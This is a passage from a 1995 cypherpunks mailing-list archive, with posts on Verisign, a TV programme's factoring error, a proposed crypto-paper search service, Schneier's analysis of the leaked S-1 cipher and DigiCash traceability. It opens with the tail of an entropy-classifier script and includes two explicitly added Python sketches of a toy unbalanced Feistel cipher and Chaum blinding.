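    blanked[MARKER_OFFSET:MARKER_OFFSET + len(MARKER)] = b" " * len(MARKER)
    text = b"Quarterly report draft, do not distribute.\r\n" * 1500
    return {
        "labelled": bytes(labelled) + body,
        "blanked": bytes(blanked) + body,
        "text": text,
    }


if __name__ == "__main__":
    for name, blob in make_samples().items():
        print(f"{name}: {classify(blob)} ({shannon_entropy(blob[:SAMPLE_SIZE]):.2f} bits/byte)")
```
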





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an5877@anon.penet.fi (deadbeat)
Date: Wed, 6 Sep 95 00:12:45 PDT
To: cypherpunks@toad.com
Subject: Re: SSLRef (SSLtelnet)
Message-ID: <9509060647.AA14769@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>       Verisign is a spin off of RSA.

Verisign, Inc. (VERISIGN-DOM)
   100 Marine Parkway, Suite 525
   Redwood City, CA  94065

   Domain Name: VERISIGN.COM

   Administrative Contact, Technical Contact, Zone Contact:
      Taylor, Simon  (ST192)  simon@RSA.COM
      (415) 508-1151

   Record last updated on 21-Jun-95.

DEADBEAT

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAgUBME0AO/FZTpBW/B35AQFdLAGAiV1RqNmLh5W+uuHeKsXX/819qK5WTq3Y
TobFKWLxkTjkEwDs6Js7UB2PFRnt6gDk
=HEHU
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <tunny@Inference.COM>
Date: Wed, 6 Sep 95 07:49:18 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: RE: Equinox/cypherpunks/www
Message-ID: <304DB3A8@smtp-pc>
MIME-Version: 1.0
Content-Type: text/plain



> Anyone that missed or was unable to get the UK TV programme Equinox
> might like to take a look at:
>
>   http://www.cityscape.co.uk/channel4/big_bytes/cybersecrecy/cyber000.html
>
> - Andy

Thanks for the pointer.  I was reading through their nicely
organized gentle introduction to basic concepts, when I nearly
sprayed coffee all over my monitor from laughing so hard at
the following gaffe:

"...most modern codes rely on the intractable mathematical
problem of 'factorisation'. This is the process of trying to
find the two prime factors that, multiplied together, would
give you a third prime number. [JT: Yes, I'd call that an
intractable problem, all right.] For example, if you take
3337 - a prime number (i.e. a number that has precisely two
divisors) - how would you find its two prime factors? (They
are, in fact, 47 and 71.)"

A little unclear on that "prime" thing, it sounds like... :-)

 - Tunny
______________________________________________________________________
James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
tunny@Inference.com    | <--finger for key  36 07 D9 33 3D 32 53 9C
======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 6 Sep 95 06:13:41 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Another Son of Clipper discussion paper
In-Reply-To: <v02120d08ac72acec4bb0@[192.0.2.1]>
Message-ID: <9509061312.AA12676@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
 > Windows 95 is on a lot of people's hard drives. It is therefore public and
 > available for every one's inspection.  How many people do you know that
 > have reverse engineered Windows 95. How many of those use a reverse
 > engineered version. I'd venture it is zero out of zero.

Problems with this analogy:

1) Windows 95 is somewhat bigger than your typical encryption
routine;

2) The factor of motivation isn't considered.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Wed, 6 Sep 95 05:48:12 PDT
To: cypherpunks@toad.com
Subject: Searchable Crypto Paper Archive?
Message-ID: <199509061244.IAA01601@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


[My apologies if this is a repost.  The original was posted a couple of
days ago via a news gateway which may or may not have actually worked.]


I was trying to dig up some cryptography papers cited as references
today, when a thought hit me; there seem to be a fair amount of crypto
papers available on the Net, but they're pretty scattered.  Bell Labs
has some online, which is great!  The cypherpunks FTP archive has a
few, though you can't perform keyword searches against them.  In
short, it's hard to find papers unless you already know what you want
and where it might be.

Having had some experience in designing and implementing technical
report retrieval services, I naturally think there's room for
improvement here. 8-) What I have in mind is something like NASA's
NTRS ("NASA Technical Report Server",
<http://techreports.larc.nasa.gov/cgi-bin/NTRS>), which I helped
design and implement at my last job.

The basic idea behind NTRS is that users submit a query to a sort of
"search multiplexer" which queries a list of selected databases,
merges the separate result sets and gives them back to the user.  The
results are typically bibliographic and abstract data about papers,
which contain links to the papers themselves if they are available
online, or ordering info if they're not.  From past experience, I
think this model could be applied here very successfully.

One way to accomplish this would be to establish an archive where
people could submit papers to be indexed.  Larger institutions (such
as Bell Labs) might run their own servers, so they would have control
of their own content but could still be searched via the multiplexer.
Users of the service could then search all the different archives they
were interested in with one simple query.

Anyway, this is what I'd like to see.  I'm willing to work on such a
system if there's enough positive feedback.  Does anyone else think
they'd like to use or contribute to such a system?

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			|
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 6 Sep 95 06:03:28 PDT
To: cypherpunks@toad.com
Subject: Re: Lotus Notes vs. the Web and the Net
Message-ID: <v02120d04ac733aaa13b8@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 PM 9/5/95, Timothy C. May wrote:
>On this one I agree...and I've said this here on this list. Local groups,
>such as university departments, corporate departments, even entire
>corporations, can use the Web/Net in ways similar to what Lotus Notes
>provides (using their own LANs, or even the Internet, with suitable
>security steps).

My favorite financial application for small multinationals (one of my
clients is a haircutter with 50 salons and 4 schools worldwide) is nightly
remittances to the home office in e$, especially in cash.

The consequences for the banking and tax systems are obvious. But it's
possible to imagine interesting changes in the foreign exchange markets as
well ...



Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Wed, 6 Sep 95 07:09:33 PDT
To: cypherpunks@toad.com
Subject: the S-1 Algorithm
Message-ID: <199509061409.JAA05371@subzero>
MIME-Version: 1.0
Content-Type: text


[I just posted this to sci.crypt.  I don't normally read Cypherpunks, so
please forward any substantive replies directly to me.  Thanks.  -Bruce]


I was in Europe while S-1 was posted, so I missed most of the
discussion.  Better late than never....

Over the last year, I have spent considerable effort collecting
SKIPJACK information.  I have gone through the published
literature, the rumors, and a large stack of documents received
by EPIC through Freedom of Information Act (FOIA) lawsuits.

At Crypto last week I gave a Rump Session talk entitled "Reverse
Engineering SKIPJACK from Open Sources."  I prepared the slides
before I left for Europe.  Here is what I said:

     What the government told us:
          Single-key block cipher.
          Can be used in ECB, CBC, CFB, or OFB.
          64-bit block size.
          80-bit key size.

     What the review committee told us:
          32 rounds.
          No weak keys (like DES has).
          No key complementation property (like DES has).

     What the hardware specifications tell us:
          The latency of the Mykotronx chip has 64 clock cycles. 
               This means two clock cycles per round.

     Assorted rumors (excuse me if I don't reveal sources):
          SKIPJACK does not have rounds in the same sense that
               DES does: i.e., half of the text block is not
               encrypted in each round.
          SKIPJACK has half the total S-box data as DES.
          SKIPJACK has a 48-bit internal structure analogous to a
               32-bit internal structure in DES.
          The masks for the Clipper/Capstone chip are
               unclassified and the chips can be produced in an
               unclassified foundry.  Part of the programming in
               the secure vault includes installing part of the
               SKIPJACK algorithm.  The part of the algorithm
               installed in the secure vault are the "S-tables",
               suggesting that perhaps unprogrammed Clipper chips
               can be programmed to implement other 80-bit key,
               32 round ciphers.

Trying to puzzle out the meaning of the third rumor, Matt Blaze
and I invented something called an Unbalanced Feistel Network. 
These are Feistel networks where the source and target blocks are
of different size.  For example, in each round 48 bits might be
used as an input into the F function, and produce 16 output bits
to be XORed with the remainder of the bits.  We called this a
48:16 UFN, and we proposed a design at last year's Algorithms
Workshop in Leuven.  Our design was broken, but I am still
examining the structure.  A 48:16 UFN satisfies the first and
third rumor above, and I think it as good a guess as any
regarding SKIPJACK.

A few months ago, I found some additional information in the form
of documents released under FOIA.  One document was a Mykotronx
design review for "Project Capstone" dated 10 December 1991.  The
design review was unclassified.  Among the details about the
modular multipliers and the SHA code was the following page about
SKIPJACK:

     ECB Processing Rate

          2 clocks per G-Box operation
          x 1 G-box per shift
          x 32 shifts per ECB encryption
          ______________________________
          64 clocks per ECB

     64 clocks per ECB / 64 bits out per ECB = 1 clock per bit
     Yields 40 Mbit encryption using a 40 MHz clock.

The only other thing I found was a SECRET memo.  The organization
name (either from or to) is blacked out.  The date is 25 August
1992.  The subject is "SKIPJACK Revision."  Paragraph 2 is
blacked out, but paragraph 1 reads:

     1.  (U) The enclosed Informal Technical Report revises the
     F-table in SKIPJACK 3.  No other aspect of the algorithm is
     changed.

That's it.  Rounds are called "shifts," which seems to indicate
that they are not "rounds" in the DES sense.  A shift consists of
a "G-box" operation, which includes not only what we call the
F-function but the XOR as well.  And there is something called an
F-table, which could be a table of constants or perhaps a table
of functions.  In any case, it is something that can be revised
without changing the rest of the algorithm.

Now let's look at S-1.  The most probable explanation is that it
is a hoax.  But it is a very good hoax:

     The hoaxer knew enough about algorithm design to make a
          cipher that was not obviously lousy, while at the same
          time not unduly complicated.  The hoaxer knew enough to
          make a design that included three novel ideas not seen
          anywhere else: S-boxes that are created according to no
          known criteria, a G-table that chooses a rotation of
          S-boxes to use in a given round, and a bizarre key
          schedule.
     The hoaxer knew enough about how algorithms are used in the
          military to make a spookish interface.  I am
          particularly interested in the "zeroize" function, the
          separation of the key creation and key loading
          functions, and the key masking.  Blaze said that the
          interface was similar to the Fortezza interface, but
          not the same.
     The hoaxer knew about Blaze's and my MacGuffin paper and
          that we thought SKIPJACK was a 48:16 UFN.  We made no
          secret about this, and our paper is on Blaze's web
          page.  The hoaxer knew to use the term F-table.  I
          haven't shown many people what I found in EPIC's
          documents, so the hoaxer either had to look through
          them himself or get them by some other means (maybe an
          independent FOIA request).

It's not a perfect hoax, though.  The classification markings
look odd: NSA algorithms are SECRET, not TOP SECRET, and the
codeword restriction sentence is strange.  The key schedule is
hopelessly flawed (David Wagner posted an attack to sci.crypt). 
The coding style is amateurish, like it was translated from one
language to another.  (Maybe this is clever on the hoaxer's
part.)  And there's even a typo in the code.

And maybe the hardware latency is wrong.  Clearly the design
facilitates parallelization.  You can precompute all possible F-
table outputs in previous shifts, and then use the G-table result
to select between them; I am not sure you can get a shift down to
two clock cycles.  I don't have the hardware background, and
would appreciate comments from others.

And why are there not bitwise permutations?  If SKIPJACK is
designed for hardware, it makes sense to put them in.  They're
free, after all.

Anyway, it's a real good hoax.  Blaze estimated that he could
have done it, but it would have taken him a month of effort.  I
agree with his assessment: one man-month.  It's a lot of time to
spend on a hoax, especially one where the hoaxer doesn't get any
credit.

So, maybe it's SKIPJACK.  It has a 64-bit block size and an 80-
bit key size.  It's a 48:16 UFN with 32 rounds (or shifts, or
whatever).  And it has an F-table.  This is really interesting,
because the structure really is an S-box.  Everyone knows it's an
S-box, and it makes no sense for a hoaxer to call it something
else.  But in S-1 it's called an F-table.  (I think this is very
significant, but others find it less convincing.)

And the F-table has been revised at least once.  In the code it
says that the F-table entries "differ in the S-2 version."  The
code is dated 1 February 1989 and 31 July 1991, and I have a memo
dated 25 August 1992 that says the F-table has been revised in
"SKIPJACK 3."  Pretty convincing, I think.  (Of course this means
that we can't confirm anything by testing the hardware, since the
F-table entries are different.)

Maybe there are no bit permutations because they make analysis
harder, and perhaps they don't add all that much.  Maybe the
algorithm was designed for both hardware and software, or maybe
it was designed for specialized cryptographic hardware with
several parallel microprocessors and some cryptographic
primitives. 

If it is real, we have a lot to learn about S-box design.  The S-
boxes are not even balanced.  Maybe they are created just so to
avoid some bizarre attack we can only dream about, but I kind of
doubt it.

But the key schedule is just plain wrong.

So, here's a theory.  Let's assume the code is real.  (Not that
it's SKIPJACK, but that it's a real algorithm from some military
or some corporation.)  Clearly the code is not designed to test
the cryptographic algorithm, but to simulate some kind of
hardware interface: it's called a "software chip simulator."  If
I were the NSA and I designed an algorithm whose security rested
on some tables of constants, I might replace them with phony
constants before giving them to another organization to test.  I
might call the phony version S-1 and the real version S-2.

Maybe the code was originally written in FORTRAN, and then
translated into C.  (NSA doesn't use ADA.)

NSA algorithms are classified SECRET, but perhaps algorithms in
development are classified TOP SECRET.  (We know cryptanalytic
techniques can be TOP SECRET, so perhaps commented code falls
under that category as well.)

And maybe the code originally didn't have an 80-bit key schedule.
Maybe it had a longer key schedule.  The poster then modified
this key schedule to make it look more like SKIPJACK.  (This
might also explain the bug in the code, which might not be a bug
if it still had the original key schedule.)

Which leaves us precisely nowhere.  The most likely explanation
is that it is a hoax, but I am hard-pressed to imagine a hoaxer
with the requisite combination of skills, resources, and
attitude.  I also don't believe that it is SKIPJACK.  It might be
a preliminary design for SKIPJACK, but if both the key schedule
and F-table entries are wrong, we really haven't learned
anything.  If we suddenly discovered that unbalanced S-boxes are
far superior to balanced ones, then all bets are off.

Bruce

************************************************************************
* Bruce Schneier            2,000,000,000,000,000,000,000,000,002,000,
* Counterpane Systems       000,000,000,000,000,000,002,000,000,002,293 
* schneier@counterpane.com  The last prime number...alphabetically!
* (708) 524-9461            Two vigintillion, two undecillion, two 
* 730 Fair Oaks Ave.        trillion, two thousand, two hundred and 
* Oak Park, IL  60302       ninety three.
************************************************************************
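
The 48:16 unbalanced Feistel structure described in the post above, as an added sketch that is not from the post, the S-1 listing or the MacGuffin paper. The F function, key schedule and sample values are constructed placeholders with no security value; the point is that each round changes only one 16-bit word and that decryption never has to invert F.

```python
"""Toy 48:16 unbalanced Feistel network (UFN) on a 64-bit block.

Structure only: toy_f and toy_round_keys are constructed placeholders.
This is not SKIPJACK, S-1 or MacGuffin.
"""

ROUNDS = 32                      # round ("shift") count quoted in the post
KEY_BITS = 80                    # key size quoted in the post
WORD_MASK = 0xFFFF               # 16-bit target word
SRC_MASK = (1 << 48) - 1         # 48-bit source block


def split_block(block):
    """64-bit integer -> four 16-bit words, most significant first."""
    return [(block >> shift) & WORD_MASK for shift in (48, 32, 16, 0)]


def join_block(words):
    """Four 16-bit words -> 64-bit integer."""
    block = 0
    for w in words:
        block = (block << 16) | (w & WORD_MASK)
    return block


def toy_f(source48, round_key48):
    """Placeholder F: 48 bits in, 16 bits out. It need not be invertible."""
    x = (source48 ^ round_key48) & SRC_MASK
    x = (x * 0x9E3779B97F4B) & SRC_MASK      # arbitrary odd multiplier (assumption)
    x ^= x >> 23
    return (x ^ (x >> 16) ^ (x >> 32)) & WORD_MASK


def toy_round_keys(key80):
    """Placeholder schedule: rotate the 80-bit key, keep the low 48 bits."""
    if not 0 <= key80 < (1 << KEY_BITS):
        raise ValueError("key must fit in 80 bits")
    keys = []
    for i in range(ROUNDS):
        r = (i * 13) % KEY_BITS
        rotated = ((key80 << r) | (key80 >> (KEY_BITS - r))) & ((1 << KEY_BITS) - 1)
        keys.append((rotated ^ i) & SRC_MASK)
    return keys


def ufn_round(words, round_key48):
    """XOR F(48 source bits) into the 16-bit target, then rotate the words
    so the next word becomes the target."""
    target, s1, s2, s3 = words
    source48 = (s1 << 32) | (s2 << 16) | s3
    return [s1, s2, s3, target ^ toy_f(source48, round_key48)]


def ufn_round_inverse(words, round_key48):
    """Undo one round: the source words are still in the clear, so F is
    recomputed and XORed out again."""
    s1, s2, s3, target = words
    source48 = (s1 << 32) | (s2 << 16) | s3
    return [target ^ toy_f(source48, round_key48), s1, s2, s3]


def encrypt_block(block, key80):
    words = split_block(block)
    for rk in toy_round_keys(key80):
        words = ufn_round(words, rk)
    return join_block(words)


def decrypt_block(block, key80):
    words = split_block(block)
    for rk in reversed(toy_round_keys(key80)):
        words = ufn_round_inverse(words, rk)
    return join_block(words)


def words_changed_by_one_round(block, round_key48):
    """Count the 16-bit words whose value one round alters (at most 1)."""
    before = split_block(block)
    after = ufn_round(before, round_key48)
    aligned = [after[3]] + after[:3]         # undo the rotation to compare
    return sum(a != b for a, b in zip(before, aligned))


if __name__ == "__main__":
    KEY = 0x00112233445566778899             # constructed 80-bit key
    PT = 0x0123456789ABCDEF                  # constructed plaintext block
    ct = encrypt_block(PT, KEY)
    print(f"ct={ct:016x} round-trip ok={decrypt_block(ct, KEY) == PT}")
```

With 32 rounds and four words, each word is the target eight times.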




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 09:25:08 PDT
To: "David J. Bianco" <cypherpunks@toad.com
Subject: Re: Searchable Crypto Paper Archive?
Message-ID: <ac73124613021004c605@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:48 PM 9/6/95, David J. Bianco wrote:

>I was trying to dig up some cryptography papers cited as references
>today, when a thought hit me; there seem to be a fair amount of crypto
>papers available on the Net, but they're pretty scattered.  Bell Labs
>has some online, which is great!  The cypherpunks FTP archive has a
>few, though you can't perform keyword searches against them.  In
>short, it's hard to find papers unless you already know what you want
>and where it might be.
>
>Having had some experience in designing and implementing technical
>report retrieval services, I naturally think there's room for
>improvement here. 8-) What I have in mind is something like NASA's
>NTRS ("NASA Technical Report Server",
><http://techreports.larc.nasa.gov/cgi-bin/NTRS>), which I helped
>design and implement at my last job.

It's an idea with some attraction. But some issues need discussing. Being
an analytical sort of person, prone to looking for flaws in ideas, I'll
mention a few:

1. First and foremost, _copyright_ issues. Most articles are copyrighted
(automatically, by Berne Convention) and the permission of the authors must
be obtained. Authors may also collect royalties, or the conferences may, so
unlimited electronic distribution is a potential problem.

NASA can publish its reports (and those of other government agencies)
electronically because it has the copyrights, or the copyrights are free
and clear. Try putting someone's article on the Net without their
permission and look out.

Indeed, there are a couple of the most important papers on the soda archive
site, some of them scanned-in and OCRed by "The Information Liberation
Front." There are so few that the authors likely don't even know they are
there, or care. But try to put lots of copyrighted material on a site and
get ready for actions. Remember, most nations are party to the Berne
Convention(s).

2. Many of the papers have complex typography, lots of equations and
diagrams. These reproduce poorly on most screens, and really need a new
level of display presentation. (Yes, I know about Adobe Acrobat, which I
have. Ditto for FrameMaker, and a few other such systems. But not many
others have them.)

I happen to know the ILF member who posted the Chaum "Dining
Cryptographers" paper, anonymously, and know that he picked that paper both
because of its importance to his interests and because it was pure text,
with no equations and no diagrams. This made it a natural for scanning.

3. In the crypto domain, the papers are much more conveniently concentrated
into a handful of conference proceedings, nearly all published by
Springer-Verlag. (Those great silvery-grey paperbacks.)

This point about Springer-Verlag relates to Item #1 above. Namely, that
copyright holders (Springer-Verlag, through publishing arrangements with
the conferences) will not take kindly to folks making the papers available
electronically.

This point, about the limited number of main crypto volumes, also implies
another point: many of these papers refer to other papers in the same
volume or set of volumes (e.g., papers in the "Crypto '93 Proceedings" will
refer to papers in that volume or earlier volumes). This makes it *even
more advantageous* for a serious researcher to buy the complete set of
volumes.

4. Authentication issues. Electronic versions of articles will need to be
signed, to prevent unauthorized modifications. The infrastructure for this
is beginning to build, but is clearly not available to many.

I am confident that someday most journals will be published electronically.
Many people think this likely, whether in 5 years or 15 years. Just too
many advantages.

However--and this is my point--before that happens a huge amount of
negotiation about author's rights to reproduction, about verification of
copies, about royalty payments for copies, etc., has to happen. And, the
display software/hardware is not quite there yet....too many people would
be unable to see the equations and diagrams on the screen. In 5 years, less
of a problem.

Many authors make their papers available by anonymous ftp, or via the Web.
I think this is the way to do it: let those who feel their papers need
electronic dissemination do so. The author makes the choice.

In summary, this project is probably premature (technologically), has
numerous copyright issues to be resolved, and is probably less needed in
the crypto community than in some other areas.

(Granted, we are not following those other areas, necessarily. But that
other domains have not yet gone fully electronic is indicative that others
see some of these same problems, and are likely to address them before the
math/crypto community does.)

Sorry to dissect this proposal so thoroughly, but it's one of the things I do.

--Tim May


(P.S. The copyright problems can possibly be skirted by using anonymous
remailers and offshore data havens in jurisdictions that will not raid the
sites, or by message pools. But these are major steps, mostly untested. A
"Scientology" site is probably a better test than a site with crypto
papers. I wouldn't want to run either of them.)



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 6 Sep 95 01:46:03 PDT
To: cypherpunks@toad.com
Subject: Equinox/cypherpunks/www
Message-ID: <Pine.SOL.3.91.950906094127.8572B@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Anyone that missed or was unable to get the UK TV programme Equinox might 
like to take a look at:

http://www.cityscape.co.uk/channel4/big_bytes/cybersecrecy/cyber000.html

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Wed, 6 Sep 95 08:46:25 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <v02120d11ac72f4de4e9a@[192.0.2.1]>
Message-ID: <199509061545.JAA24947@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 I, Bryce Wilcox <bryce.wilcox@colorado.edu> wrote:
>
> > Suppose you have acquired a million dollars worth of legal, above-board
> > DigiCash dollars and you want to surreptitiously transfer this wealth to 
> > a below-board friend.  Your friend creates a temporary anonymous account 
> > at an understanding bank.


 shamrock@netcom.com (Lucky Green) wrote:
>
> Won't work. Ecash, except as used for frequent flyer like points, will
> exist in only *one* world wide e$ currency, issued by a single entity
> composed of various major banks and subject to US laws. Getting Ecash
> accounts will therefore be subject to the same legal requirenments that
> apply to normal US checking accounts.


1.  Sez who?


2.  We are discussing the feasibility of using DigiCash currency for illegal
money laundering.  We have to assume (ceteris paribus) that the would-be
launderers are still capable of the same tricks that they are currently
capable of, which, apparently, includes access to anonymous bank accounts.

 
> > Now without active physical surveillance, nobody other than yourself and 
> > your friend will ever know where the money went, and you can't prove 
> > that you gave it to him, either...
 
 
> You or a sting operation can always reveal the recipient by publishing the
> blinding factor.


If you do it via his one-time bank account then you can only reveal to which
one-time anonymous account you transferred the money-- no more.


Even if you and your beneficiary don't have this option, the transaction
is still much safer and more convenient if done via DigiCash than via any 
other current currency.  Criminals and conspirators live with the everpresent
problem of betrayal, and this "one step, one way, requires the cooperation of
the payer" traceability seems to me to be a small hassle on the way to a big
win for such people.


> Besides, your Ecash client keeps a log of the payees.


Crytographically (and in the limit, legally) meaningless, right?  I could
edit my log right now to say I gave you a thousand cyberbucks in return for
an illegal copy of some information, but no-one would care.



I appreciate your correspondance.


Bryce

signatures follow:


                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBME3CFvWZSllhfG25AQFi3gQAmyJoB3RJKx3lNb1fCLPluulVbi6kh3+I
++fGXC8vTGOEfaNnkjOxvcZ5VCXRJNlwQB9D2hKICSJCxpoQWKSDjgEWy48HH8AV
P0LSBfQ/LX9O91X7/dkyBCDoULhPx2HYTSbOgumS10+X/IsldUfcY36q0tTQy3u7
7ES5HIG2wv8=
=idOQ
-----END PGP SIGNATURE-----
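
The blinding-factor point argued in the message above, as an added illustration that is not part of the thread and not DigiCash's actual protocol: textbook Chaum RSA blinding with a constructed toy key, serials, blinding factors and hypothetical account names. It shows that the bank's logs alone fit every withdrawal to a given coin, while a blinding factor published by the payer pins down exactly one deposit, here a one-time account.

```python
from math import gcd

# Constructed toy bank key: two Mersenne primes, far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))        # bank's private exponent


def blind(serial, r):
    """Payer hides the coin serial before sending it to the bank."""
    if gcd(r, N) != 1:
        raise ValueError("blinding factor must be invertible mod N")
    return serial * pow(r, E, N) % N


def bank_sign(blinded):
    """Bank signs what it is shown; it never sees the serial."""
    return pow(blinded, D, N)


def unblind(blind_sig, r):
    """Payer strips r, leaving an ordinary RSA signature on the serial."""
    return blind_sig * pow(r, -1, N) % N


def verify(serial, sig):
    return pow(sig, E, N) == serial % N


def implied_factor(blinded, serial):
    """The r that would tie this withdrawal to this coin. One exists for
    every pair, so the bank's own logs cannot single out a withdrawal."""
    return pow(blinded * pow(serial, -1, N) % N, D, N)


def recipient_from_disclosed_factor(blinded, r, deposit_log):
    """With r published, unblind the logged withdrawal and look the
    resulting serial up among the deposits."""
    serial = blinded * pow(pow(r, E, N), -1, N) % N
    return deposit_log.get(serial)


def run_scenario():
    # Constructed serials and blinding factors for two withdrawals.
    payer_serial, payer_r = 0x5EED0001, 1234567891
    other_serial, other_r = 0x5EED0002, 987654321
    withdrawal_log = {
        "payer": blind(payer_serial, payer_r),
        "bystander": blind(other_serial, other_r),
    }
    payer_coin = unblind(bank_sign(withdrawal_log["payer"]), payer_r)
    other_coin = unblind(bank_sign(withdrawal_log["bystander"]), other_r)
    assert verify(payer_serial, payer_coin) and verify(other_serial, other_coin)

    # Both coins are later deposited into hypothetical one-time accounts.
    deposit_log = {payer_serial: "one-time-acct-17",
                   other_serial: "one-time-acct-42"}

    # Bank alone: every withdrawal is consistent with the payer's coin.
    consistent = [
        who for who, blinded in withdrawal_log.items()
        if blind(payer_serial, implied_factor(blinded, payer_serial)) == blinded
    ]
    # Payer cooperates and publishes r: exactly one deposit is identified.
    revealed = recipient_from_disclosed_factor(
        withdrawal_log["payer"], payer_r, deposit_log)
    return consistent, revealed


if __name__ == "__main__":
    print(run_scenario())
```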




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 09:56:34 PDT
To: "David J. Bianco" <cypherpunks@toad.com
Subject: Re: Searchable Crypto Paper Archive?
Message-ID: <ac7321aa1402100463c3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 PM 9/6/95, David J. Bianco wrote:

>S'ok with me.  It's not like I'm dead set on doing this or anything.  It's
>just an observation, and an offer of service if anyone thinks it'd be
>useful.
>
>Oh, BTW, another thing I probably should mention that seems obvious to me:
> I'm offering to do this for free.  That is, the database would be a public
>service, with no charge to list papers, add another database to the
>searching list or to query/retrieve abstracts.

I'll look forward to seeing this, then.

I was just noting some issues which seem likely to arise.

But if you plan to do this "if anyone thinks it'd be useful," then I think
it would be useful, so you've met your criterion for doing the project.

Good luck! Keep us posted.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Wed, 6 Sep 95 07:22:49 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "This discussion is off-topic, please take it elsewhere"
In-Reply-To: <ac71c5aa03021004a06d@[205.199.118.202]>
Message-ID: <Pine.PMDF.3.91.950906102111.539017112C-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


You keep talking about this "Eric Hughes" nym.  I've been a member of 
this list for weeks, months, over a year even, and I never see any posts 
from "him".  Is he a dead tentacle?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
This post is smiley-free and may injure the humor-impaired.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 10:40:34 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509061709.MAA00612@bioanalytical.com>
Message-ID: <Pine.LNX.3.91.950906103417.19696B-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> Will cryptographic technology and information (communication)
> technology reduce the need for legal services in the future?
> (especially regarding contracts, buying/selling, patent law, etc.)
> Will legal services just look different?  Will they be more
> efficient (cheaper)?
> 
